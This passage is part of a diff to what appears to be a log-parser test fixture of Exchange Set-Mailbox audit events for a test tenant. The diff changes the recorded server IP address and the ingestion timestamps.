Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853135200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2690,12 +2690,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2738,7 +2738,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2750,8 +2750,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177662Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853140400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2771,12 +2771,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2819,7 +2819,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2831,8 +2831,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177665100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853145400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2852,12 +2852,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2900,7 +2900,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2912,8 +2912,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177667900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853151200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2933,12 +2933,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2981,7 +2981,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2993,8 +2993,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177670700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853155300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3014,12 +3014,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3062,7 +3062,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3074,8 +3074,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177673300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853159300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 